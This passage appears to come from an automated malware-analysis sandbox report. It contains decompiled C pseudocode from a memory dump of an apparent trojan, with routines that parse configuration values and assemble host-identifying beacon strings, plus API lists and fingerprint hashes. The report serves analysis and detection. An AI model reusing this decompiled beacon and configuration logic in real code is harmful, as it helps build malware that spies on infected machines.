                                                                                                                          				char* _t45;
                                                                                                                          				char* _t46;
                                                                                                                          				char* _t47;
                                                                                                                          				char* _t48;
                                                                                                                          				char* _t49;
                                                                                                                          				char* _t50;
                                                                                                                          				void* _t51;
                                                                                                                          				void* _t52;
                                                                                                                          				void* _t53;
                                                                                                                          				intOrPtr _t54;
                                                                                                                          				void* _t56;
                                                                                                                          				intOrPtr _t57;
                                                                                                                          				intOrPtr _t58;
                                                                                                                          				signed int _t61;
                                                                                                                          				intOrPtr _t64;
                                                                                                                          				signed int _t65;
                                                                                                                          				signed int _t70;
                                                                                                                          				void* _t72;
                                                                                                                          				void* _t73;
                                                                                                                          				signed int _t75;
                                                                                                                          				signed int _t78;
                                                                                                                          				signed int _t82;
                                                                                                                          				signed int _t86;
                                                                                                                          				signed int _t90;
                                                                                                                          				signed int _t94;
                                                                                                                          				signed int _t98;
                                                                                                                          				void* _t103;
                                                                                                                          				intOrPtr _t121;
                                                                                                                          
                                                                                                                          				_t104 = __ecx;
                                                                                                                          				_t28 =  *0x497d2dc; // 0x69b25f44
                                                                                                                          				if(E04975657( &_v8,  &_v12, _t28 ^ 0x889a0120) != 0 && _v12 >= 0x110) {
                                                                                                                          					 *0x497d310 = _v8;
                                                                                                                          				}
                                                                                                                          				_t33 =  *0x497d2dc; // 0x69b25f44
                                                                                                                          				if(E04975657( &_v16,  &_v12, _t33 ^ 0x0159e6c7) == 0) {
                                                                                                                          					_v12 = 2;
                                                                                                                          					L69:
                                                                                                                          					return _v12;
                                                                                                                          				}
                                                                                                                          				_t39 =  *0x497d2dc; // 0x69b25f44
                                                                                                                          				if(E04975657( &_v12,  &_v8, _t39 ^ 0xe60382a5) == 0) {
                                                                                                                          					L67:
                                                                                                                          					HeapFree( *0x497d270, 0, _v16);
                                                                                                                          					goto L69;
                                                                                                                          				} else {
                                                                                                                          					_t103 = _v12;
                                                                                                                          					if(_t103 == 0) {
                                                                                                                          						_t45 = 0;
                                                                                                                          					} else {
                                                                                                                          						_t98 =  *0x497d2dc; // 0x69b25f44
                                                                                                                          						_t45 = E04973BB8(_t104, _t103, _t98 ^ 0x7895433b);
                                                                                                                          					}
                                                                                                                          					if(_t45 != 0) {
                                                                                                                          						_t104 =  &_v8;
                                                                                                                          						if(StrToIntExA(_t45, 0,  &_v8) != 0) {
                                                                                                                          							 *0x497d278 = _v8;
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          					if(_t103 == 0) {
                                                                                                                          						_t46 = 0;
                                                                                                                          					} else {
                                                                                                                          						_t94 =  *0x497d2dc; // 0x69b25f44
                                                                                                                          						_t46 = E04973BB8(_t104, _t103, _t94 ^ 0x219b08c7);
                                                                                                                          					}
                                                                                                                          					if(_t46 != 0) {
                                                                                                                          						_t104 =  &_v8;
                                                                                                                          						if(StrToIntExA(_t46, 0,  &_v8) != 0) {
                                                                                                                          							 *0x497d27c = _v8;
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          					if(_t103 == 0) {
                                                                                                                          						_t47 = 0;
                                                                                                                          					} else {
                                                                                                                          						_t90 =  *0x497d2dc; // 0x69b25f44
                                                                                                                          						_t47 = E04973BB8(_t104, _t103, _t90 ^ 0x31fc0661);
                                                                                                                          					}
                                                                                                                          					if(_t47 != 0) {
                                                                                                                          						_t104 =  &_v8;
                                                                                                                          						if(StrToIntExA(_t47, 0,  &_v8) != 0) {
                                                                                                                          							 *0x497d280 = _v8;
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          					if(_t103 == 0) {
                                                                                                                          						_t48 = 0;
                                                                                                                          					} else {
                                                                                                                          						_t86 =  *0x497d2dc; // 0x69b25f44
                                                                                                                          						_t48 = E04973BB8(_t104, _t103, _t86 ^ 0x0cd926ce);
                                                                                                                          					}
                                                                                                                          					if(_t48 != 0) {
                                                                                                                          						_t104 =  &_v8;
                                                                                                                          						if(StrToIntExA(_t48, 0,  &_v8) != 0) {
                                                                                                                          							 *0x497d004 = _v8;
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          					if(_t103 == 0) {
                                                                                                                          						_t49 = 0;
                                                                                                                          					} else {
                                                                                                                          						_t82 =  *0x497d2dc; // 0x69b25f44
                                                                                                                          						_t49 = E04973BB8(_t104, _t103, _t82 ^ 0x3cd8b2cb);
                                                                                                                          					}
                                                                                                                          					if(_t49 != 0) {
                                                                                                                          						_t104 =  &_v8;
                                                                                                                          						if(StrToIntExA(_t49, 0,  &_v8) != 0) {
                                                                                                                          							 *0x497d02c = _v8;
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          					if(_t103 == 0) {
                                                                                                                          						_t50 = 0;
                                                                                                                          					} else {
                                                                                                                          						_t78 =  *0x497d2dc; // 0x69b25f44
                                                                                                                          						_t50 = E04973BB8(_t104, _t103, _t78 ^ 0x2878b929);
                                                                                                                          					}
                                                                                                                          					if(_t50 == 0) {
                                                                                                                          						L41:
                                                                                                                          						 *0x497d284 = 5;
                                                                                                                          						goto L42;
                                                                                                                          					} else {
                                                                                                                          						_t104 =  &_v8;
                                                                                                                          						if(StrToIntExA(_t50, 0,  &_v8) == 0 || _v8 == 0) {
                                                                                                                          							goto L41;
                                                                                                                          						} else {
                                                                                                                          							L42:
                                                                                                                          							if(_t103 == 0) {
                                                                                                                          								_t51 = 0;
                                                                                                                          							} else {
                                                                                                                          								_t75 =  *0x497d2dc; // 0x69b25f44
                                                                                                                          								_t51 = E04973BB8(_t104, _t103, _t75 ^ 0x261a367a);
                                                                                                                          							}
                                                                                                                          							if(_t51 != 0) {
                                                                                                                          								_push(_t51);
                                                                                                                          								_t72 = 0x10;
                                                                                                                          								_t73 = E049749B8(_t72);
                                                                                                                          								if(_t73 != 0) {
                                                                                                                          									_push(_t73);
                                                                                                                          									E04974B98();
                                                                                                                          								}
                                                                                                                          							}
                                                                                                                          							if(_t103 == 0) {
                                                                                                                          								_t52 = 0;
                                                                                                                          							} else {
                                                                                                                          								_t70 =  *0x497d2dc; // 0x69b25f44
                                                                                                                          								_t52 = E04973BB8(_t104, _t103, _t70 ^ 0xb9d404b2);
                                                                                                                          							}
                                                                                                                          							if(_t52 != 0 && E049749B8(0, _t52) != 0) {
                                                                                                                          								_t121 =  *0x497d364; // 0x6ff95b0
                                                                                                                          								E04979311(_t121 + 4, _t68);
                                                                                                                          							}
                                                                                                                          							if(_t103 == 0) {
                                                                                                                          								_t53 = 0;
                                                                                                                          							} else {
                                                                                                                          								_t65 =  *0x497d2dc; // 0x69b25f44
                                                                                                                          								_t53 = E04973BB8(_t104, _t103, _t65 ^ 0x3df17130);
                                                                                                                          							}
                                                                                                                          							if(_t53 == 0) {
                                                                                                                          								L59:
                                                                                                                          								_t54 =  *0x497d2e0; // 0x267a5a8
                                                                                                                          								_t22 = _t54 + 0x497e252; // 0x616d692f
                                                                                                                          								 *0x497d30c = _t22;
                                                                                                                          								goto L60;
                                                                                                                          							} else {
                                                                                                                          								_t64 = E049749B8(0, _t53);
                                                                                                                          								 *0x497d30c = _t64;
                                                                                                                          								if(_t64 != 0) {
                                                                                                                          									L60:
                                                                                                                          									if(_t103 == 0) {
                                                                                                                          										_t56 = 0;
                                                                                                                          									} else {
                                                                                                                          										_t61 =  *0x497d2dc; // 0x69b25f44
                                                                                                                          										_t56 = E04973BB8(_t104, _t103, _t61 ^ 0xd2079859);
                                                                                                                          									}
                                                                                                                          									if(_t56 == 0) {
                                                                                                                          										_t57 =  *0x497d2e0; // 0x267a5a8
                                                                                                                          										_t23 = _t57 + 0x497e79a; // 0x6976612e
                                                                                                                          										_t58 = _t23;
                                                                                                                          									} else {
                                                                                                                          										_t58 = E049749B8(0, _t56);
                                                                                                                          									}
                                                                                                                          									 *0x497d380 = _t58;
                                                                                                                          									HeapFree( *0x497d270, 0, _t103);
                                                                                                                          									_v12 = 0;
                                                                                                                          									goto L67;
                                                                                                                          								}
                                                                                                                          								goto L59;
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          			}

                                                                                                                          0x04974d4d
                                                                                                                          0x04974d52
                                                                                                                          0x04974d52
                                                                                                                          0x04974d4d
                                                                                                                          0x04974d59
                                                                                                                          0x04974d6f
                                                                                                                          0x04974d5b
                                                                                                                          0x04974d5b
                                                                                                                          0x04974d68
                                                                                                                          0x04974d68
                                                                                                                          0x04974d73
                                                                                                                          0x04974d75
                                                                                                                          0x04974d7f
                                                                                                                          0x04974d84
                                                                                                                          0x04974d84
                                                                                                                          0x04974d7f
                                                                                                                          0x04974d8b
                                                                                                                          0x04974da1
                                                                                                                          0x04974d8d
                                                                                                                          0x04974d8d
                                                                                                                          0x04974d9a
                                                                                                                          0x04974d9a
                                                                                                                          0x04974da5
                                                                                                                          0x04974da7
                                                                                                                          0x04974db1
                                                                                                                          0x04974db6
                                                                                                                          0x04974db6
                                                                                                                          0x04974db1
                                                                                                                          0x04974dbd
                                                                                                                          0x04974dd3
                                                                                                                          0x04974dbf
                                                                                                                          0x04974dbf
                                                                                                                          0x04974dcc
                                                                                                                          0x04974dcc
                                                                                                                          0x04974dd7
                                                                                                                          0x04974dea
                                                                                                                          0x04974dea
                                                                                                                          0x00000000
                                                                                                                          0x04974dd9
                                                                                                                          0x04974dd9
                                                                                                                          0x04974de3
                                                                                                                          0x00000000
                                                                                                                          0x04974df4
                                                                                                                          0x04974df4
                                                                                                                          0x04974df6
                                                                                                                          0x04974e0c
                                                                                                                          0x04974df8
                                                                                                                          0x04974df8
                                                                                                                          0x04974e05
                                                                                                                          0x04974e05
                                                                                                                          0x04974e10
                                                                                                                          0x04974e12
                                                                                                                          0x04974e15
                                                                                                                          0x04974e16
                                                                                                                          0x04974e1d
                                                                                                                          0x04974e1f
                                                                                                                          0x04974e20
                                                                                                                          0x04974e20
                                                                                                                          0x04974e1d
                                                                                                                          0x04974e27
                                                                                                                          0x04974e3d
                                                                                                                          0x04974e29
                                                                                                                          0x04974e29
                                                                                                                          0x04974e36
                                                                                                                          0x04974e36
                                                                                                                          0x04974e41
                                                                                                                          0x04974e4f
                                                                                                                          0x04974e59
                                                                                                                          0x04974e59
                                                                                                                          0x04974e60
                                                                                                                          0x04974e76
                                                                                                                          0x04974e62
                                                                                                                          0x04974e62
                                                                                                                          0x04974e6f
                                                                                                                          0x04974e6f
                                                                                                                          0x04974e7a
                                                                                                                          0x04974e8d
                                                                                                                          0x04974e8d
                                                                                                                          0x04974e92
                                                                                                                          0x04974e98
                                                                                                                          0x00000000
                                                                                                                          0x04974e7c
                                                                                                                          0x04974e7f
                                                                                                                          0x04974e84
                                                                                                                          0x04974e8b
                                                                                                                          0x04974e9d
                                                                                                                          0x04974e9f
                                                                                                                          0x04974eb5
                                                                                                                          0x04974ea1
                                                                                                                          0x04974ea1
                                                                                                                          0x04974eae
                                                                                                                          0x04974eae
                                                                                                                          0x04974eb9
                                                                                                                          0x04974ec5
                                                                                                                          0x04974eca
                                                                                                                          0x04974eca
                                                                                                                          0x04974ebb
                                                                                                                          0x04974ebe
                                                                                                                          0x04974ebe
                                                                                                                          0x04974ed8
                                                                                                                          0x04974edd
                                                                                                                          0x04974ee3
                                                                                                                          0x00000000
                                                                                                                          0x04974ee3
                                                                                                                          0x00000000
                                                                                                                          0x04974e8b
                                                                                                                          0x04974e7a
                                                                                                                          0x04974de3
                                                                                                                          0x04974dd7

                                                                                                                          APIs
                                                                                                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,04975390,?,69B25F44,?,04975390,69B25F44,?,04975390,69B25F44,00000005,0497D00C,00000008), ref: 04974CE5
                                                                                                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,04975390,?,69B25F44,?,04975390,69B25F44,?,04975390,69B25F44,00000005,0497D00C,00000008), ref: 04974D17
                                                                                                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,04975390,?,69B25F44,?,04975390,69B25F44,?,04975390,69B25F44,00000005,0497D00C,00000008), ref: 04974D49
                                                                                                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,04975390,?,69B25F44,?,04975390,69B25F44,?,04975390,69B25F44,00000005,0497D00C,00000008), ref: 04974D7B
                                                                                                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,04975390,?,69B25F44,?,04975390,69B25F44,?,04975390,69B25F44,00000005,0497D00C,00000008), ref: 04974DAD
                                                                                                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,04975390,?,69B25F44,?,04975390,69B25F44,?,04975390,69B25F44,00000005,0497D00C,00000008), ref: 04974DDF
                                                                                                                          • HeapFree.KERNEL32(00000000,04975390,04975390,?,69B25F44,?,04975390,69B25F44,?,04975390,69B25F44,00000005,0497D00C,00000008,?,04975390), ref: 04974EDD
                                                                                                                          • HeapFree.KERNEL32(00000000,?,04975390,?,69B25F44,?,04975390,69B25F44,?,04975390,69B25F44,00000005,0497D00C,00000008,?,04975390), ref: 04974EF0
                                                                                                                            • Part of subcall function 049749B8: lstrlen.KERNEL32(69B25F44,00000000,7656D3B0,04975390,04974EC3,00000000,04975390,?,69B25F44,?,04975390,69B25F44,?,04975390,69B25F44,00000005), ref: 049749C1
                                                                                                                            • Part of subcall function 049749B8: memcpy.NTDLL(00000000,?,00000000,00000001,?,04975390), ref: 049749E4
                                                                                                                            • Part of subcall function 049749B8: memset.NTDLL ref: 049749F3
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.942731260.0000000004971000.00000020.00020000.sdmp, Offset: 04970000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.942716356.0000000004970000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.942751568.000000000497C000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.942765529.000000000497D000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.942780831.000000000497F000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: FreeHeap$lstrlenmemcpymemset
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3442150357-0
                                                                                                                          • Opcode ID: 679369828340cea8f59f78e0a3fd7863b5788407af824d11d1582fcfb16978e7
                                                                                                                          • Instruction ID: 45bfc3088364a1fdc7a4a6734cb8c6296c0171a29d3d146eb35a1444bee25833
                                                                                                                          • Opcode Fuzzy Hash: 679369828340cea8f59f78e0a3fd7863b5788407af824d11d1582fcfb16978e7
                                                                                                                          • Instruction Fuzzy Hash: 51816170A04204BFDB21DBB49E88DAB7BEEEF887107244A75E501D7116FA39FD419B60
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 66%
                                                                                                                          			E049744A4(long __eax, void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, void* _a16, void* _a24, intOrPtr _a32) {
                                                                                                                          				intOrPtr _v0;
                                                                                                                          				intOrPtr _v4;
                                                                                                                          				intOrPtr _v16;
                                                                                                                          				intOrPtr _v24;
                                                                                                                          				intOrPtr _v28;
                                                                                                                          				void* _v44;
                                                                                                                          				intOrPtr _v52;
                                                                                                                          				void* __edi;
                                                                                                                          				long _t25;
                                                                                                                          				intOrPtr _t26;
                                                                                                                          				intOrPtr _t27;
                                                                                                                          				intOrPtr _t28;
                                                                                                                          				intOrPtr _t29;
                                                                                                                          				intOrPtr _t30;
                                                                                                                          				void* _t33;
                                                                                                                          				intOrPtr _t34;
                                                                                                                          				int _t37;
                                                                                                                          				intOrPtr _t42;
                                                                                                                          				intOrPtr _t43;
                                                                                                                          				intOrPtr _t50;
                                                                                                                          				intOrPtr _t54;
                                                                                                                          				intOrPtr* _t56;
                                                                                                                          				intOrPtr _t62;
                                                                                                                          				intOrPtr _t68;
                                                                                                                          				intOrPtr _t71;
                                                                                                                          				intOrPtr _t74;
                                                                                                                          				int _t77;
                                                                                                                          				intOrPtr _t78;
                                                                                                                          				int _t81;
                                                                                                                          				intOrPtr _t83;
                                                                                                                          				int _t86;
                                                                                                                          				intOrPtr* _t89;
                                                                                                                          				intOrPtr* _t90;
                                                                                                                          				void* _t91;
                                                                                                                          				void* _t95;
                                                                                                                          				void* _t96;
                                                                                                                          				void* _t97;
                                                                                                                          				intOrPtr _t98;
                                                                                                                          				void* _t100;
                                                                                                                          				int _t101;
                                                                                                                          				void* _t102;
                                                                                                                          				void* _t103;
                                                                                                                          				void* _t105;
                                                                                                                          				void* _t106;
                                                                                                                          				void* _t108;
                                                                                                                          
                                                                                                                          				_t95 = __edx;
                                                                                                                          				_t91 = __ecx;
                                                                                                                          				_t25 = __eax;
                                                                                                                          				_t105 = _a16;
                                                                                                                          				_v4 = 8;
                                                                                                                          				if(__eax == 0) {
                                                                                                                          					_t25 = GetTickCount();
                                                                                                                          				}
                                                                                                                          				_t26 =  *0x497d018; // 0x14d7c998
                                                                                                                          				asm("bswap eax");
                                                                                                                          				_t27 =  *0x497d014; // 0x3a87c8cd
                                                                                                                          				asm("bswap eax");
                                                                                                                          				_t28 =  *0x497d010; // 0xd8d2f808
                                                                                                                          				asm("bswap eax");
                                                                                                                          				_t29 =  *0x497d00c; // 0x81762942
                                                                                                                          				asm("bswap eax");
                                                                                                                          				_t30 =  *0x497d2e0; // 0x267a5a8
                                                                                                                          				_t3 = _t30 + 0x497e633; // 0x74666f73
                                                                                                                          				_t101 = wsprintfA(_t105, _t3, 2, 0x3f874, _t29, _t28, _t27, _t26,  *0x497d02c,  *0x497d004, _t25);
                                                                                                                          				_t33 = E04975B60();
                                                                                                                          				_t34 =  *0x497d2e0; // 0x267a5a8
                                                                                                                          				_t4 = _t34 + 0x497e673; // 0x74707526
                                                                                                                          				_t37 = wsprintfA(_t101 + _t105, _t4, _t33);
                                                                                                                          				_t108 = _t106 + 0x38;
                                                                                                                          				_t102 = _t101 + _t37;
                                                                                                                          				_t96 = E04971BBF(_t91);
                                                                                                                          				if(_t96 != 0) {
                                                                                                                          					_t83 =  *0x497d2e0; // 0x267a5a8
                                                                                                                          					_t6 = _t83 + 0x497e8cc; // 0x736e6426
                                                                                                                          					_t86 = wsprintfA(_t102 + _t105, _t6, _t96);
                                                                                                                          					_t108 = _t108 + 0xc;
                                                                                                                          					_t102 = _t102 + _t86;
                                                                                                                          					HeapFree( *0x497d270, 0, _t96);
                                                                                                                          				}
                                                                                                                          				_t97 = E0497137A();
                                                                                                                          				if(_t97 != 0) {
                                                                                                                          					_t78 =  *0x497d2e0; // 0x267a5a8
                                                                                                                          					_t8 = _t78 + 0x497e8d4; // 0x6f687726
                                                                                                                          					_t81 = wsprintfA(_t102 + _t105, _t8, _t97);
                                                                                                                          					_t108 = _t108 + 0xc;
                                                                                                                          					_t102 = _t102 + _t81;
                                                                                                                          					HeapFree( *0x497d270, 0, _t97);
                                                                                                                          				}
                                                                                                                          				_t98 =  *0x497d364; // 0x6ff95b0
                                                                                                                          				_a32 = E04973857(0x497d00a, _t98 + 4);
                                                                                                                          				_t42 =  *0x497d308; // 0x0
                                                                                                                          				if(_t42 != 0) {
                                                                                                                          					_t74 =  *0x497d2e0; // 0x267a5a8
                                                                                                                          					_t11 = _t74 + 0x497e8ae; // 0x3d736f26
                                                                                                                          					_t77 = wsprintfA(_t102 + _t105, _t11, _t42);
                                                                                                                          					_t108 = _t108 + 0xc;
                                                                                                                          					_t102 = _t102 + _t77;
                                                                                                                          				}
                                                                                                                          				_t43 =  *0x497d304; // 0x0
                                                                                                                          				if(_t43 != 0) {
                                                                                                                          					_t71 =  *0x497d2e0; // 0x267a5a8
                                                                                                                          					_t13 = _t71 + 0x497e885; // 0x3d706926
                                                                                                                          					wsprintfA(_t102 + _t105, _t13, _t43);
                                                                                                                          				}
                                                                                                                          				if(_a32 != 0) {
                                                                                                                          					_t100 = RtlAllocateHeap( *0x497d270, 0, 0x800);
                                                                                                                          					if(_t100 != 0) {
                                                                                                                          						E0497A811(GetTickCount());
                                                                                                                          						_t50 =  *0x497d364; // 0x6ff95b0
                                                                                                                          						__imp__(_t50 + 0x40);
                                                                                                                          						asm("lock xadd [eax], ecx");
                                                                                                                          						_t54 =  *0x497d364; // 0x6ff95b0
                                                                                                                          						__imp__(_t54 + 0x40);
                                                                                                                          						_t56 =  *0x497d364; // 0x6ff95b0
                                                                                                                          						_t103 = E04971974(1, _t95, _t105,  *_t56);
                                                                                                                          						asm("lock xadd [eax], ecx");
                                                                                                                          						if(_t103 != 0) {
                                                                                                                          							StrTrimA(_t103, 0x497c2ac);
                                                                                                                          							_push(_t103);
                                                                                                                          							_t62 = E049738CA();
                                                                                                                          							_v16 = _t62;
                                                                                                                          							if(_t62 != 0) {
                                                                                                                          								_t89 = __imp__;
                                                                                                                          								 *_t89(_t103, _v0);
                                                                                                                          								 *_t89(_t100, _a4);
                                                                                                                          								_t90 = __imp__;
                                                                                                                          								 *_t90(_t100, _v28);
                                                                                                                          								 *_t90(_t100, _t103);
                                                                                                                          								_t68 = E04972A4E(0xffffffffffffffff, _t100, _v28, _v24);
                                                                                                                          								_v52 = _t68;
                                                                                                                          								if(_t68 != 0 && _t68 != 0x10d2) {
                                                                                                                          									E049747D5();
                                                                                                                          								}
                                                                                                                          								HeapFree( *0x497d270, 0, _v44);
                                                                                                                          							}
                                                                                                                          							HeapFree( *0x497d270, 0, _t103);
                                                                                                                          						}
                                                                                                                          						HeapFree( *0x497d270, 0, _t100);
                                                                                                                          					}
                                                                                                                          					HeapFree( *0x497d270, 0, _a24);
                                                                                                                          				}
                                                                                                                          				HeapFree( *0x497d270, 0, _t105);
                                                                                                                          				return _a12;
                                                                                                                          			}

                                                                                                                          APIs
                                                                                                                          • GetTickCount.KERNEL32 ref: 049744BB
                                                                                                                          • wsprintfA.USER32 ref: 04974508
                                                                                                                          • wsprintfA.USER32 ref: 04974525
                                                                                                                          • wsprintfA.USER32 ref: 04974548
                                                                                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 04974558
                                                                                                                          • wsprintfA.USER32 ref: 0497457A
                                                                                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 0497458A
                                                                                                                          • wsprintfA.USER32 ref: 049745C1
                                                                                                                          • wsprintfA.USER32 ref: 049745E1
                                                                                                                          • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 049745FE
                                                                                                                          • GetTickCount.KERNEL32 ref: 0497460E
                                                                                                                          • RtlEnterCriticalSection.NTDLL(06FF9570), ref: 04974622
                                                                                                                          • RtlLeaveCriticalSection.NTDLL(06FF9570), ref: 04974640
                                                                                                                            • Part of subcall function 04971974: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,745EC740,?,?,04974653,?,06FF95B0), ref: 0497199F
                                                                                                                            • Part of subcall function 04971974: lstrlen.KERNEL32(?,?,?,04974653,?,06FF95B0), ref: 049719A7
                                                                                                                            • Part of subcall function 04971974: strcpy.NTDLL ref: 049719BE
                                                                                                                            • Part of subcall function 04971974: lstrcat.KERNEL32(00000000,?), ref: 049719C9
                                                                                                                            • Part of subcall function 04971974: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,04974653,?,06FF95B0), ref: 049719E6
                                                                                                                          • StrTrimA.SHLWAPI(00000000,0497C2AC,?,06FF95B0), ref: 04974672
                                                                                                                            • Part of subcall function 049738CA: lstrlen.KERNEL32(06FF9B10,00000000,00000000,745EC740,0497467E,00000000), ref: 049738DA
                                                                                                                            • Part of subcall function 049738CA: lstrlen.KERNEL32(?), ref: 049738E2
                                                                                                                            • Part of subcall function 049738CA: lstrcpy.KERNEL32(00000000,06FF9B10), ref: 049738F6
                                                                                                                            • Part of subcall function 049738CA: lstrcat.KERNEL32(00000000,?), ref: 04973901
                                                                                                                          • lstrcpy.KERNEL32(00000000,?), ref: 04974691
                                                                                                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 04974698
                                                                                                                          • lstrcat.KERNEL32(00000000,?), ref: 049746A5
                                                                                                                          • lstrcat.KERNEL32(00000000,00000000), ref: 049746A9
                                                                                                                          • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 049746D9
                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 049746E8
                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,?,06FF95B0), ref: 049746F7
                                                                                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 04974709
                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 04974718
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.942731260.0000000004971000.00000020.00020000.sdmp, Offset: 04970000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.942716356.0000000004970000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.942751568.000000000497C000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.942765529.000000000497D000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.942780831.000000000497F000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: Heap$Free$wsprintf$lstrcatlstrlen$lstrcpy$CountCriticalSectionTickTrim$AllocateEnterLeavestrcpy
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3963266935-0
                                                                                                                          • Opcode ID: 7729c36a8a4f66cb58905c561165e5584b2b73640c497083a407a13532ec7a25
                                                                                                                          • Instruction ID: 728e5d6cc378c18541f4f9c6bf8e7ab3b0c3f8e5a8ad69ff512c686a7d611bee
                                                                                                                          • Opcode Fuzzy Hash: 7729c36a8a4f66cb58905c561165e5584b2b73640c497083a407a13532ec7a25
                                                                                                                          • Instruction Fuzzy Hash: B1618E71508200AFEB219B64EC88F5A3FA8FF89754F040634FA05D7251E63DED06DBA5
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 74%
                                                                                                                          			E04976109(long __eax, void* __ecx, void* __edx, intOrPtr _a4, char** _a8, int* _a12, void* _a16) {
                                                                                                                          				void* _v8;
                                                                                                                          				signed int _v12;
                                                                                                                          				void* _v16;
                                                                                                                          				void* _v20;
                                                                                                                          				void* _v24;
                                                                                                                          				void* _v28;
                                                                                                                          				void* __ebx;
                                                                                                                          				void* __edi;
                                                                                                                          				long _t59;
                                                                                                                          				intOrPtr _t60;
                                                                                                                          				intOrPtr _t61;
                                                                                                                          				intOrPtr _t62;
                                                                                                                          				intOrPtr _t63;
                                                                                                                          				intOrPtr _t64;
                                                                                                                          				void* _t67;
                                                                                                                          				intOrPtr _t68;
                                                                                                                          				int _t71;
                                                                                                                          				void* _t72;
                                                                                                                          				void* _t73;
                                                                                                                          				void* _t75;
                                                                                                                          				void* _t78;
                                                                                                                          				intOrPtr _t82;
                                                                                                                          				intOrPtr _t86;
                                                                                                                          				intOrPtr* _t88;
                                                                                                                          				void* _t94;
                                                                                                                          				intOrPtr _t100;
                                                                                                                          				signed int _t104;
                                                                                                                          				char** _t106;
                                                                                                                          				int _t109;
                                                                                                                          				intOrPtr* _t112;
                                                                                                                          				intOrPtr* _t114;
                                                                                                                          				intOrPtr* _t116;
                                                                                                                          				intOrPtr* _t118;
                                                                                                                          				intOrPtr _t121;
                                                                                                                          				intOrPtr _t126;
                                                                                                                          				int _t130;
                                                                                                                          				CHAR* _t132;
                                                                                                                          				intOrPtr _t133;
                                                                                                                          				void* _t134;
                                                                                                                          				void* _t143;
                                                                                                                          				int _t144;
                                                                                                                          				void* _t145;
                                                                                                                          				intOrPtr _t146;
                                                                                                                          				void* _t148;
                                                                                                                          				long _t152;
                                                                                                                          				intOrPtr* _t153;
                                                                                                                          				intOrPtr* _t154;
                                                                                                                          				intOrPtr* _t157;
                                                                                                                          				void* _t158;
                                                                                                                          				void* _t160;
                                                                                                                          
                                                                                                                          				_t143 = __edx;
                                                                                                                          				_t134 = __ecx;
                                                                                                                          				_t59 = __eax;
                                                                                                                          				_v12 = 8;
                                                                                                                          				if(__eax == 0) {
                                                                                                                          					_t59 = GetTickCount();
                                                                                                                          				}
                                                                                                                          				_t60 =  *0x497d018; // 0x14d7c998
                                                                                                                          				asm("bswap eax");
                                                                                                                          				_t61 =  *0x497d014; // 0x3a87c8cd
                                                                                                                          				_t132 = _a16;
                                                                                                                          				asm("bswap eax");
                                                                                                                          				_t62 =  *0x497d010; // 0xd8d2f808
                                                                                                                          				asm("bswap eax");
                                                                                                                          				_t63 =  *0x497d00c; // 0x81762942
                                                                                                                          				asm("bswap eax");
                                                                                                                          				_t64 =  *0x497d2e0; // 0x267a5a8
                                                                                                                          				_t3 = _t64 + 0x497e633; // 0x74666f73
                                                                                                                          				_t144 = wsprintfA(_t132, _t3, 3, 0x3f874, _t63, _t62, _t61, _t60,  *0x497d02c,  *0x497d004, _t59);
                                                                                                                          				_t67 = E04975B60();
                                                                                                                          				_t68 =  *0x497d2e0; // 0x267a5a8
                                                                                                                          				_t4 = _t68 + 0x497e673; // 0x74707526
                                                                                                                          				_t71 = wsprintfA(_t144 + _t132, _t4, _t67);
                                                                                                                          				_t160 = _t158 + 0x38;
                                                                                                                          				_t145 = _t144 + _t71;
                                                                                                                          				_t72 = E04971BBF(_t134);
                                                                                                                          				_t133 = __imp__;
                                                                                                                          				_v8 = _t72;
                                                                                                                          				if(_t72 != 0) {
                                                                                                                          					_t126 =  *0x497d2e0; // 0x267a5a8
                                                                                                                          					_t7 = _t126 + 0x497e8cc; // 0x736e6426
                                                                                                                          					_t130 = wsprintfA(_a16 + _t145, _t7, _t72);
                                                                                                                          					_t160 = _t160 + 0xc;
                                                                                                                          					_t145 = _t145 + _t130;
                                                                                                                          					HeapFree( *0x497d270, 0, _v8);
                                                                                                                          				}
                                                                                                                          				_t73 = E0497137A();
                                                                                                                          				_v8 = _t73;
                                                                                                                          				if(_t73 != 0) {
                                                                                                                          					_t121 =  *0x497d2e0; // 0x267a5a8
                                                                                                                          					_t11 = _t121 + 0x497e8d4; // 0x6f687726
